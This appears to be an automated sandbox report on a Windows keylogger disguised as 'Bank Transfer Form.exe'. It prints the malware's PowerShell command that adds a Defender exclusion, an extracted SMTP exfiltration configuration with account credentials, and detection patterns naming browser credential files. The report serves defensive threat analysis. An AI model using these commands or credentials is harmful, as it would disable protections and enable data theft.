Edit tour

Windows Analysis Report
Bank Transfer Form.exe

Overview

General Information

Sample name:	Bank Transfer Form.exe
Analysis ID:	1619055
MD5:	2f8a0052d88d31c435d71cd69f930f02
SHA1:	993258bc6b7f24bf6cddb3c2576d2f5e2d113df2
SHA256:	3c00e14ee895971b1e91ad04aebc4970b9526b79ee8413c900acbb9b4ae702b8
Tags:	exeMassLoggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large strings

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Bank Transfer Form.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\Bank Transfer Form.exe" MD5: 2F8A0052D88D31C435D71CD69F930F02)

powershell.exe (PID: 7588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bank Transfer Form.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\Bank Transfer Form.exe" MD5: 2F8A0052D88D31C435D71CD69F930F02)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x89890:$a1: get_encryptedPassword 0x89e18:$a2: get_encryptedUsername 0x89503:$a3: get_timePasswordChanged 0x8961a:$a4: get_passwordField 0x898a6:$a5: set_encryptedPassword 0x8c5c2:$a6: get_passwords 0x8c956:$a7: get_logins 0x8c5ae:$a8: GetOutlookPasswords 0x8bf67:$a9: StartKeylogger 0x8c8af:$a10: KeyLoggerEventArgs 0x8c007:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3704d0:$a1: get_encryptedPassword 0x3b32f0:$a1: get_encryptedPassword 0x370a58:$a2: get_encryptedUsername 0x3b3878:$a2: get_encryptedUsername 0x370143:$a3: get_timePasswordChanged 0x3b2f63:$a3: get_timePasswordChanged 0x37025a:$a4: get_passwordField 0x3b307a:$a4: get_passwordField 0x3704e6:$a5: set_encryptedPassword 0x3b3306:$a5: set_encryptedPassword 0x373202:$a6: get_passwords 0x3b6022:$a6: get_passwords 0x373596:$a7: get_logins 0x3b63b6:$a7: get_logins 0x3731ee:$a8: GetOutlookPasswords 0x3b600e:$a8: GetOutlookPasswords 0x372ba7:$a9: StartKeylogger 0x3b59c7:$a9: StartKeylogger 0x3734ef:$a10: KeyLoggerEventArgs 0x3b630f:$a10: KeyLoggerEventArgs 0x372c47:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Bank Transfer Form.exe PID: 7404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7404	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7404	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7404	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7404	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8ddf4:$a1: get_encryptedPassword 0x11426a:$a1: get_encryptedPassword 0x8e28d:$a2: get_encryptedUsername 0x1147e8:$a2: get_encryptedUsername 0x8da89:$a3: get_timePasswordChanged 0x113eec:$a3: get_timePasswordChanged 0x8db94:$a4: get_passwordField 0x114003:$a4: get_passwordField 0x8de0a:$a5: set_encryptedPassword 0x114280:$a5: set_encryptedPassword 0x9061c:$a6: get_passwords 0x116f44:$a6: get_passwords 0x908f3:$a7: get_logins 0x1172d4:$a7: get_logins 0x90608:$a8: GetOutlookPasswords 0x116f30:$a8: GetOutlookPasswords 0x9004a:$a9: StartKeylogger 0x1168e9:$a9: StartKeylogger 0x90861:$a10: KeyLoggerEventArgs 0x11722d:$a10: KeyLoggerEventArgs 0x900ea:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Bank Transfer Form.exe PID: 7596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7596	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7596	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Bank Transfer Form.exe PID: 7596	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe7719:$a1: get_encryptedPassword 0xe7c97:$a2: get_encryptedUsername 0xe739b:$a3: get_timePasswordChanged 0xe74b2:$a4: get_passwordField 0xe772f:$a5: set_encryptedPassword 0xea3f3:$a6: get_passwords 0xea783:$a7: get_logins 0xea3df:$a8: GetOutlookPasswords 0xe9d98:$a9: StartKeylogger 0xea6dc:$a10: KeyLoggerEventArgs 0xe9e38:$a11: KeyLoggerEventArgsEventHandler
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data 0x3977d:$a5: \Kometa\User Data\Default\Login Data
0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.Bank Transfer Form.exe.4990830.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Bank Transfer Form.exe.4990830.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Bank Transfer Form.exe.4990830.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Bank Transfer Form.exe.4990830.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.4990830.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Bank Transfer Form.exe.4990830.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Bank Transfer Form.exe.4990830.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
0.2.Bank Transfer Form.exe.4990830.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data 0x3977d:$a5: \Kometa\User Data\Default\Login Data
0.2.Bank Transfer Form.exe.4990830.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.Bank Transfer Form.exe.4990830.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
3.2.Bank Transfer Form.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Bank Transfer Form.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.Bank Transfer Form.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.Bank Transfer Form.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.4990830.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d761:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9be:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data 0x7e39d:$a5: \Kometa\User Data\Default\Login Data
3.2.Bank Transfer Form.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
3.2.Bank Transfer Form.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.Bank Transfer Form.exe.4990830.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
0.2.Bank Transfer Form.exe.4909010.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Bank Transfer Form.exe.4909010.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Bank Transfer Form.exe.4909010.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Bank Transfer Form.exe.4909010.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb54c0:$a1: get_encryptedPassword 0xf82e0:$a1: get_encryptedPassword 0xb5a48:$a2: get_encryptedUsername 0xf8868:$a2: get_encryptedUsername 0xb5133:$a3: get_timePasswordChanged 0xf7f53:$a3: get_timePasswordChanged 0xb524a:$a4: get_passwordField 0xf806a:$a4: get_passwordField 0xb54d6:$a5: set_encryptedPassword 0xf82f6:$a5: set_encryptedPassword 0xb81f2:$a6: get_passwords 0xfb012:$a6: get_passwords 0xb8586:$a7: get_logins 0xfb3a6:$a7: get_logins 0xb81de:$a8: GetOutlookPasswords 0xfaffe:$a8: GetOutlookPasswords 0xb7b97:$a9: StartKeylogger 0xfa9b7:$a9: StartKeylogger 0xb84df:$a10: KeyLoggerEventArgs 0xfb2ff:$a10: KeyLoggerEventArgs 0xb7c37:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.4909010.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6884:$s1: UnHook 0xf96a4:$s1: UnHook 0xb688b:$s2: SetHook 0xf96ab:$s2: SetHook 0xb6893:$s3: CallNextHook 0xf96b3:$s3: CallNextHook 0xb68a0:$s4: _hook 0xf96c0:$s4: _hook
0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13cce0:$a1: get_encryptedPassword 0x17fb00:$a1: get_encryptedPassword 0x13d268:$a2: get_encryptedUsername 0x180088:$a2: get_encryptedUsername 0x13c953:$a3: get_timePasswordChanged 0x17f773:$a3: get_timePasswordChanged 0x13ca6a:$a4: get_passwordField 0x17f88a:$a4: get_passwordField 0x13ccf6:$a5: set_encryptedPassword 0x17fb16:$a5: set_encryptedPassword 0x13fa12:$a6: get_passwords 0x182832:$a6: get_passwords 0x13fda6:$a7: get_logins 0x182bc6:$a7: get_logins 0x13f9fe:$a8: GetOutlookPasswords 0x18281e:$a8: GetOutlookPasswords 0x13f3b7:$a9: StartKeylogger 0x1821d7:$a9: StartKeylogger 0x13fcff:$a10: KeyLoggerEventArgs 0x182b1f:$a10: KeyLoggerEventArgs 0x13f457:$a11: KeyLoggerEventArgsEventHandler
0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13e0a4:$s1: UnHook 0x180ec4:$s1: UnHook 0x13e0ab:$s2: SetHook 0x180ecb:$s2: SetHook 0x13e0b3:$s3: CallNextHook 0x180ed3:$s3: CallNextHook 0x13e0c0:$s4: _hook 0x180ee0:$s4: _hook
Click to see the 35 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bank Transfer Form.exe", ParentImage: C:\Users\user\Desktop\Bank Transfer Form.exe, ParentProcessId: 7404, ParentProcessName: Bank Transfer Form.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", ProcessId: 7588, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bank Transfer Form.exe", ParentImage: C:\Users\user\Desktop\Bank Transfer Form.exe, ParentProcessId: 7404, ParentProcessName: Bank Transfer Form.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", ProcessId: 7588, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T14:44:16.064648+0100	2803305	3	Unknown Traffic	192.168.2.4	49736	104.21.80.1	443	TCP
2025-02-19T14:44:18.306056+0100	2803305	3	Unknown Traffic	192.168.2.4	49742	104.21.80.1	443	TCP
2025-02-19T14:44:20.685248+0100	2803305	3	Unknown Traffic	192.168.2.4	49746	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T14:44:14.505098+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	193.122.130.0	80	TCP
2025-02-19T14:44:15.473353+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	193.122.130.0	80	TCP
2025-02-19T14:44:16.598337+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T14:44:25.866630+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49753	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587"}
Source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Bank Transfer Form.exe	ReversingLabs: Detection: 36%
Source: Bank Transfer Form.exe	Virustotal: Detection: 40%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 3.2.Bank Transfer Form.exe.400000.0.unpack	String decryptor: obilog@jhxkgroup.online
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack	String decryptor: 7213575aceACE@@
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack	String decryptor: mail.jhxkgroup.online
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack	String decryptor: obi@jhxkgroup.online
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack	String decryptor: 587
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Bank Transfer Form.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Source: Bank Transfer Form.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BxFK.pdbSHA256D source: Bank Transfer Form.exe
Source:	Binary string: BxFK.pdb source: Bank Transfer Form.exe

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 0180F8E9h	3_2_0180F631
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 0180FD41h	3_2_0180FA88
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F331E0h	3_2_06F32DC8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F30D0Dh	3_2_06F30B30
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F31697h	3_2_06F30B30
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F32C19h	3_2_06F32968
